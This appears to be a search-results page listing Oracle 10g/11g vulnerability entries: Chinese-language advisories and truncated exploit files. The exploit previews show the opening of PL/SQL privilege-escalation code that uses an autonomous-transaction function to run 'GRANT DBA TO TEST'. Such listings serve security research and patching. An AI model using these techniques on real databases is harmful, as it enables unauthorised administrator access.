7 matches found
Oracle GENERATESCHEMA Buffer Overflow Exploit
This Exploit a buffer overflow in Oracle10g. When sending a specially formatted query to the GENERATESCHEMA function in the XDB.DBMSXMLSCHEMA package, an attacker may be able to execute arbitrary code. NOTE: For targets running DEP, you will need to choose target 0 then rexploit with target 1. Th...
Oracle Database CVE-2009-1018 Workspace Manager漏洞
Bugraq ID: 36765 CVE ID:CVE-2009-1018 Oracle Database是一款商业性质的大型数据库。 Oracle数据库Workspace Manager存在远程漏洞,此漏洞可通过'Oracle Net'协议利用,要成功利用此漏洞,攻击者必须拥有SYS.LTRIC WMSYS.LTRIC'特权。 目前没有详细漏洞细节提供。 Oracle Oracle10g Standard Edition 10.2.0.4 Oracle Oracle10g Personal Edition 10.2.0.4 Oracle Oracle10g Enterprise...
Oracle将发布2009 7月重要补丁更新修复多个安全漏洞
Bugraq ID: 35618 Oracle Database是一款商业性质大型数据库系统。 racle发布了2009年7月的紧急补丁更新公告,补丁修复了跨越100多个Oracle产品中33个安全漏洞,受影响的软件包括如下: Oracle Database Oracle Application Server Oracle Identity Management Oracle E-Business Suite Release Oracle Enterprise Manager Database Control Oracle Enterprise Manager Grid Control...
Oracle 11g/10g Installation Vulnerability
Oracle Database Server是一款商业性质的数据库服务程序。 Oracle Database Server安装过程存在设计问题,远程攻击者可以利用漏洞绕过安全在一定过程中访问数据库。 Oracle 11g和10g在安装过程中包含了SYS和SYSTEM帐户,其包含默认密码并最安装最后密码才更改,这就提供了攻击者在安装过程中登录数据库服务器的机会。导致未授权访问系统。 Oracle Oracle11g Standard Edition One 11.1 6 Oracle Oracle11g Standard Edition 11.1 6 Oracle Oracle11g...
oracle10g-2.txt
/ Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006 Joxean Koret Privileges needed: - CREATE SESSION - CREATE PROCEDURE / select from userroleprivs ; CREATE OR REPLACE FUNCTION F1 RETURN NUMBER AUTHID CURRENTUSER IS PRAGMA AUTONOMOUSTRANSACTION; BEGIN EXECUTE IMMEDIATE 'GRANT DBA TO TEST';...
oracle10g-1.txt
/ Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006 Joxean Koret Privileges needed: - EXECUTECATALOGROLE - CREATE PROCEDURE / select from userroleprivs ; CREATE OR REPLACE FUNCTION F1 RETURN NUMBER AUTHID CURRENTUSER IS PRAGMA AUTONOMOUSTRANSACTION; BEGIN EXECUTE IMMEDIATE 'GRANT DBA TO TEST'...
oracle10g-3.txt
/ Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006 Joxean Koret Privileges needed: - CREATE SESSION Max. Length 97. Very, very cool / select from userroleprivs ; DECLARE SEQUENCEOWNER VARCHAR2200; SEQUENCENAME VARCHAR2200; vuserid number; vcommands VARCHAR232767; NEWVALUE NUMBER; BEGIN SELEC...